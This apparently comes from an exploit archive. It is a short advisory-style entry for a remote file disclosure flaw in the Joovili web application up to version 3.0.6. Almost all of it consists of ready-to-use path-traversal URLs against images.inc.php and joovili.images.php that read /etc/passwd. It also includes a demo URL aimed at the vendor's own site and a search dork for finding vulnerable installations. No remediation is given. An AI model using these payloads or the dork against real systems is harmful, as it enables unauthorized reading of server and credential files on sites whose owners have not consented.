id: 2413
date: 12/27/2007
title: Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
author: EcHoLL
cves: 

==========================================================================
Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
==========================================================================



found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
 
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili



#  0day.today [2023-03-26]  #